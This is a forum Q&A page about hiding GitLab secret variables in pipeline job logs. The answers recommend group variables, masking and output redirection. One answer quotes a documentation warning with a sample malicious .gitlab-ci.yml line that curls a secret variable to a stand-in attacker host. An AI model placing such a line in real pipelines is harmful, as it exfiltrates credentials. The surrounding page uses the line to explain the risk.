Reputation: 741
Hide variable value in Gitlab pipeline logs when bash script is executed
When I run a bash file in a stage (Gitlab pipeline), it displays the GitLab secrets values in the logs which ideally should not be visible. How can I avoid this?
GitLab pipeline stage
stage: docker_push
script:
- /home/directory/dockerPush.sh
tags:
- docker
bash file (dockerPush.sh) content
docker login --username foo --password ${DOCKER_LOGIN_PASSWORD}
docker push ${IMAGE_NAME}
Pipeline Logs
+ docker login --username foo --password Doc49byfe
Upvotes: 2
Views: 6002
Answers (4)
Reputation: 22353
There are Group-Level Environmental Variables available in GitLab:
You can define per-project or per-group variables that are set in the pipeline environment. Group-level variables are stored out of the repository (not in .gitlab-ci.yml). They are securely passed to GitLab Runner, which makes them available during a pipeline run. // We recommend using group environment variables to store secrets (like passwords, SSH keys, and credentials) for Premium users who:
- Do not use an external key store.
- Use GitLab’s integration with HashiCorp Vault.
Further:
Security
Malicious code pushed to your .gitlab-ci.yml file could compromise your variables and send them to a third party server regardless of the masked setting. If the pipeline runs on a protected branch or protected tag, it could also compromise protected variables.
All merge requests that introduce changes to .gitlab-ci.yml should be reviewed carefully before:
Running a pipeline in the parent project for a merge request submitted from a forked project.
Merging the changes.
Here is a simplified example of a malicious
.gitlab-ci.yml:
build:
script:
- curl --request POST --data "secret_variable=$SECRET_VARIABLE" https://maliciouswebsite.abcd/
About Masking
Mask variable (Optional): If selected, the variable’s Value is not shown in job logs. The variable is not saved if the value does not meet the masking requirements.
Enabling debug tracing can have severe security implications. The output will contain the content of all your variables and any other secrets! The output will be uploaded to the GitLab server and made visible in job logs!
Conclusion:
- Use group variables
- If you can not: Mask variables
Upvotes: 1
Reputation: 1435
You need to use the mask feature like the Glen answer.
But the mask feature has some limitations related to format of your variable like this documentation https://docs.gitlab.com/ee/ci/variables/#masked-variable-requirements
If Gitlab refuses to mask your variable, you need to do it in your shell script.
A simple way is send the output to a file (if you really need the log) or the other option is to send the output to /dev/null
Upvotes: 1
Reputation: 2210
Did you try to add your env variable from the gitlab admin pannel, and set your variable to protected? Here is an example: https://secrethub.io/docs/guides/gitlabci/#provide-credential best,
Upvotes: -1
Related Questions
- Gitlab masking variables
- Gitlab CI: Fail pipeline if variable not set?
- Dynamically save GitLab variable for job that runs only for one pipeline
- GitLab CI: Export variable in before_script build job
- How to keep Gitlab variable masked even the value is changed?
- Unable to skip running pipeline based on variable in Gitlab CI
- Ignore certain exit codes in GitLab CI pipeline script
- gitlab ci bash script variable modification
- GITLAB: Save script output in variable .gitlab-ci.yml
- How to stop GitLab from evaluating $ inside variable value?